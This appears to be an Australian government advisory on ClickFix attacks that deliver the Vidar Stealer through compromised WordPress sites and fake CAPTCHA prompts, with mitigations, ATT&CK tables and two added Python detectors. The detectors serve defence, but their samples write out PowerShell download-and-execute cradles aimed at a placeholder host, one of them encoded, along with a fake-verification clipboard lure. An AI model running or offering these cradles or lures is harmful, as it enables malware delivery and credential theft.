First published: 07 May 2026
Last updated: 07 May 2026

Content written for: Large organisations & infrastructure; Government

Overview

The Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) has observed ClickFix associated activity leveraging WordPress hosted infrastructure to distribute the Vidar Stealer malware. This activity is targeting Australian infrastructure and organisations across multiple sectors. The campaign uses compromised WordPress websites to redirect victims to malware delivery mechanisms. This advisory provides an overview of the activity, an assessment of the threat, observed indicators, detections and recommended mitigations.

Background

ClickFix is a sophisticated social engineering technique observed since early 2024. It supports a range of malicious outcomes, including credential theft and financial compromise, through malware distribution.

ASD's ACSC has detected several variants of this attack. Notably, large-scale Traffic Distribution System infrastructure detected in 2025 was observed redirecting users to a ClickFix endpoint, among other attacks.

Since early 2026, ASD's ACSC has become aware of a number of attacks targeting Australian networks, using websites belonging to legitimate Australian businesses as a part of the ClickFix attack vector.

The technique leverages deceptive verification prompts via fake CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart), to convince users to execute malicious commands or scripts. This user‑driven execution bypasses some preventative security controls and enables the delivery of malware (Vidar in this campaign), increasing the likelihood of successful compromise across Australian networks.

Vidar Stealer is a well-known information stealing malware capable of exfiltrating credentials, browser data, cryptocurrency wallets, and system information, which may subsequently be used to facilitate follow-on malicious activity. Vidar Stealer primarily targets Windows systems.

Technical details

The ClickFix attack typically begins with an adversary injecting a malicious payload delivery domain into the compromised website. The injected payload domain loads JavaScript code from an external API server. This code overwrites the content of the legitimate page, presenting a fraudulent Cloudflare verification prompt.

The malicious JavaScript code retrieves additional content from the API server, including a PowerShell command, which is copied to the user’s clipboard. Once the user selects the “Verify you are human” checkbox, a pop‑up is displayed instructing the user to manually execute the copied command with administrative privileges.

Analysis of ClickFix‑associated activity (in Windows environments) indicates that the obfuscated PowerShell command executed by the user contains a malware delivery URL, hosted on the same payload domain used to inject malicious ClickFix content into the compromised website. Upon execution, the command retrieves and launches the Vidar Stealer malware with minimal user visibility.
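The injection chain above (external script, fake verification prompt, clipboard write) can be checked for on a site's own pages. The following is an added example written for this advisory, not ASD's ACSC tooling: a small scanner run over a constructed sample of an injected page, using a hypothetical allow list of script hosts and a reserved `.invalid` placeholder for the payload domain.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a page after ClickFix injection (not a real capture):
# an external script from a host the site does not normally use, the fake
# "verify you are human" prompt, and a clipboard write plus run instructions.
INJECTED_PAGE = """<html><head><title>Example Plumbing</title>
<script src="https://cdn.example-plumbing.com.au/site.js"></script>
<script src="https://api.payload-host-placeholder.invalid/v1/load.js"></script>
</head><body><h1>Welcome</h1>
<div id="cf-check">Verify you are human<input type="checkbox"></div>
<script>navigator.clipboard.writeText(cmd);alert("Press Win+R, Ctrl+V, Enter");</script>
</body></html>"""

CLEAN_PAGE = """<html><head><script src="https://cdn.example-plumbing.com.au/site.js"></script>
</head><body><h1>Welcome</h1></body></html>"""

# Hosts this site legitimately loads scripts from (hypothetical allow list).
TRUSTED_SCRIPT_HOSTS = {"cdn.example-plumbing.com.au"}

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
CLIPBOARD = re.compile(r'navigator\.clipboard\.writeText|execCommand\(\s*["\']copy', re.I)
LURE_TEXT = re.compile(r'verify you are human|cloudflare', re.I)
RUN_INSTRUCTION = re.compile(r'win\s*\+\s*r|powershell|ctrl\s*\+\s*v', re.I)

def scan_page(html: str, trusted_hosts=TRUSTED_SCRIPT_HOSTS) -> dict:
    """Return ClickFix indicators found in one page: script hosts outside the
    allow list, clipboard writes, verification lure text and run instructions."""
    findings = {"untrusted_script_hosts": [], "clipboard_write": False,
                "lure_text": False, "run_instruction": False}
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host not in trusted_hosts:
            findings["untrusted_script_hosts"].append(host)
    findings["clipboard_write"] = bool(CLIPBOARD.search(html))
    findings["lure_text"] = bool(LURE_TEXT.search(html))
    findings["run_instruction"] = bool(RUN_INSTRUCTION.search(html))
    return findings

def is_suspicious(findings: dict) -> bool:
    """A clipboard write next to a verification lure is the ClickFix pattern;
    an untrusted script host alone only warrants review."""
    return findings["clipboard_write"] and findings["lure_text"]

if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        f = scan_page(page)
        print(name, "SUSPICIOUS" if is_suspicious(f) else "ok", f)
```

Any host reported in `untrusted_script_hosts` is the candidate payload domain to compare against the delivery URL recovered from the PowerShell command.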

Once deployed, Vidar Stealer employs defence‑evasion techniques, including self‑deletion of the initial executable, enabling the malware to persist and operate primarily in memory. This behaviour reduces the effectiveness of forensic techniques.

Following installation, the malware establishes regular command‑and‑control (C2) communications. Initial C2 infrastructure is retrieved via dead‑drop URLs, which commonly leverage publicly accessible services such as Telegram bots and Steam profiles to hinder detection and takedown efforts. Subsequent beaconing activity consists primarily of HTTP/S POST requests that exfiltrate stolen credentials and other sensitive information.

Observed MITRE ATT&CK techniques associated with ClickFix activity detected by, and reported to, ASD's ACSC are detailed in the Appendix.

Mitigations

ASD's ACSC recommends government entities, organisations, businesses and individuals implement the following guidance, aligned with ASD’s Information security manual, to reduce the risk of compromise by a ClickFix attack.

Application control

  • Restrict execution of unauthorised or unapproved applications, including downloaded executables and scripts.
  • Prevent execution of untrusted binaries delivered via browser‑initiated activity.
  • Limit the ability for user‑initiated scripts (e.g. PowerShell) to launch secondary payloads.

Relevance: Prevents execution of Vidar Stealer and follow‑on tooling delivered via ClickFix.

Patch applications

  • For website administrators, ensure WordPress, plugins, themes, browsers, and scripting engines are fully patched and up to date.
  • For website administrators, remove unused, unsupported, or deprecated WordPress plugins and themes.
  • Prioritise patching of internet‑facing applications.

Relevance: Reduces exploitation of WordPress vulnerabilities used for initial website compromise.

User application hardening

  • Consider restricting browser‑based scripting (i.e. JavaScript) and iframe execution to allow-listed websites only.
  • Block or limit clipboard write access from browser‑based JavaScript and untrusted web content.

Relevance: Directly mitigates ClickFix techniques that rely on clipboard manipulation and browser‑based social engineering.

Restrict administrative privileges

  • Ensure users with administrative privileges are restricted from executing scripts or commands unless explicitly required.
  • Enforce least‑privilege principles and review privileged account usage regularly.

Relevance: Reduces impact of ClickFix instructions that prompt users to run commands as administrators.

Patch operating systems

  • Ensure operating systems are kept fully patched with the latest security updates.
  • Apply patches promptly to endpoints and servers, particularly those exposed to the internet.

Relevance: Limits post‑compromise exploitation and privilege escalation opportunities.

Multi‑factor authentication (MFA)

  • Enforce phishing-resistant MFA for:
    • Administrative accounts
    • Remote access services
    • Cloud services and externally accessible systems

Relevance: Reduces the impact of credential theft performed by Vidar Stealer by requiring MFA to access sensitive information.

Regular backups

  • Maintain regular, tested, and offline backups of critical systems and web content.
  • Ensure backup integrity and restoration processes are validated.

Relevance: Supports recovery from website compromise or malware‑related incidents.

Network and DNS controls

  • Filter inbound and outbound HTTP/S traffic and restrict connections to approved destinations.
  • Use protective DNS services to block known malicious domains.

Relevance: Prevents systems from resolving to attacker-controlled domains, including malware distribution sites and C2 infrastructure.

PowerShell controls

  • Enforce PowerShell code signing policies.
  • Restrict PowerShell from making outbound network connections unless allow-listed.

Relevance: Restricts execution of PowerShell commands for malicious delivery.
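Whether these controls hold can be verified from PowerShell script block logging. The following is an added example, not ASD's ACSC tooling: it decodes an `-EncodedCommand` argument (UTF-16LE, base64, as PowerShell expects) from constructed Event ID 4104-style log text, then flags download-and-execute cradles and recovers the delivery host, which the advisory notes is otherwise hidden by obfuscation. Sample commands and the `.invalid` host are constructed placeholders.

```python
import base64
import re

def encode_ps(cmd: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

# Constructed script block text (not real captures): a plain cradle, an
# encoded cradle, and a benign administrative command.
PLAIN_CRADLE = ("powershell -w hidden -ep bypass -c \"iex (iwr "
                "'https://payload-host-placeholder.invalid/v1/update.exe' -UseBasicParsing)\"")
ENCODED_CRADLE = "powershell -nop -w hidden -enc " + encode_ps(
    "$u='https://payload-host-placeholder.invalid/v1/loader.bin';"
    "iex (New-Object Net.WebClient).DownloadString($u)")
BENIGN = "powershell -c \"Get-ChildItem C:\\Users\\me\\Documents | Measure-Object\""

ENC_ARG = re.compile(r'-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]{16,})', re.I)
URL = re.compile(r'https?://([A-Za-z0-9.-]+)', re.I)
DOWNLOAD = re.compile(r'iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient', re.I)
EXECUTE = re.compile(r'\biex\b|invoke-expression|start-process', re.I)
HIDDEN = re.compile(r'-w(?:indowstyle)?\s+hidden|-nop\b|-e(?:xecutionpolicy|p)\s+bypass', re.I)

def deobfuscate(line: str) -> str:
    """Return the script text with any -EncodedCommand payload decoded in place."""
    m = ENC_ARG.search(line)
    if not m:
        return line
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return line
    return line[:m.start()] + decoded

def triage(line: str) -> dict:
    """Classify one script block: delivery hosts, cradle pattern, evasion switches."""
    text = deobfuscate(line)
    hosts = URL.findall(text)
    cradle = bool(DOWNLOAD.search(text)) and bool(EXECUTE.search(text))
    return {"delivery_hosts": hosts, "download_and_execute": cradle,
            "evasion_flags": bool(HIDDEN.search(text)),
            "suspicious": cradle and bool(hosts)}

if __name__ == "__main__":
    for sample in (PLAIN_CRADLE, ENCODED_CRADLE, BENIGN):
        print(triage(sample))
```

A recovered host that matches the script host injected into a compromised site confirms the two stages belong to the same payload domain, as described under Technical details.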

Data loss prevention (DLP)

  • Monitor for suspicious outbound POST requests and unencrypted data transfers.
  • Identify critical sensitive data and implement DLP controls to prevent unauthorised exfiltration of that data.

Relevance: Limits the impact of successful Vidar Stealer infection by detecting or preventing the exfiltration of sensitive data.

Security awareness training

  • Educate users on ClickFix‑style social engineering.
  • Reinforce guidance to never copy, paste, or execute commands from websites or pop‑ups.

Relevance: Disrupts attack at the earliest stage by reducing the likelihood of a user executing commands copied from a malicious page.

Appendix

Appendix A – MITRE ATT&CK tactics, techniques and procedures

MITRE ATT&CK techniques observed in ClickFix incidents detected by and reported to ASD's ACSC in 2026.

Table 1: ClickFix distributing Vidar Stealer techniques for resource development
Technique | ID | Use | Detection ID
Compromise Infrastructure: Web Services | T1584.006 | Adversary leverages legitimate domain infrastructure to use as attack vector. | DET0882
Acquire Infrastructure: Domains | T1583.001 | Adversary obtains domains to use for ClickFix attacks, payload delivery and C2 infrastructure. | DET0892
Obtain Capabilities: Malware | T1588.001 | Adversary obtains Vidar Stealer to steal sensitive information. | DET0845
Obtain Capabilities: Exploits | T1588.005 | Adversary obtains exploits to compromise legitimate WordPress webpages. | DET0827

Table 2: ClickFix distributing Vidar Stealer techniques for initial access
Technique | ID | Use | Detection ID
Drive-By Compromise | T1189 | Legitimate website compromised. Adversary utilises built-in web application interface, allowing for insertion of the malicious script and ClickFix iframe. | DET0176

Table 3: ClickFix distributing Vidar Stealer techniques for execution
Technique | ID | Use | Detection ID
Command and Scripting Interpreter: PowerShell | T1059.001 | Adversary utilises PowerShell commands to download and deploy a malware executable from the internet. | DET0455
User Execution: Malicious Copy and Paste | T1204.004 | Adversary relies upon a user pasting the PowerShell command (copied to their clipboard by a malicious script) into the command line as administrator. | DET0340

Table 4: ClickFix distributing Vidar Stealer techniques for defence evasion
Technique | ID | Use | Detection ID
Obfuscated Files or Information | T1027 | The PowerShell command copied to the user's clipboard is heavily obfuscated, making detection of the malware delivery URL or analysis of the command difficult. | DET0505
Indicator Removal: File Deletion | T1070.004 | Upon execution the file deletes itself and persists in memory to evade detection and prevent analysis of the executable file. | DET0140

Table 5: ClickFix distributing Vidar Stealer techniques for command and control
Technique | ID | Use | Detection ID
Application Layer Protocol: Web Protocols | T1071.001 | Adversary uses POST requests to carry stolen information to the C2 server while blending in with normal HTTP/S traffic. | DET0027
Web Service: Dead Drop Resolver | T1102.001 | Adversary leverages Telegram bots and Steam profiles as dead drop resolvers that contain C2 server details, masking the network communications as legitimate. | DET0058

Table 6: ClickFix distributing Vidar Stealer techniques for exfiltration
Technique | ID | Use | Detection ID
Exfiltration Over C2 Channel | T1041 | Adversary exfiltrates the data stolen by Vidar Stealer over an existing command and control channel. | DET0348

Indicators of compromise (IOC)

For a downloadable copy of IOCs observed, see the attached CSV file.
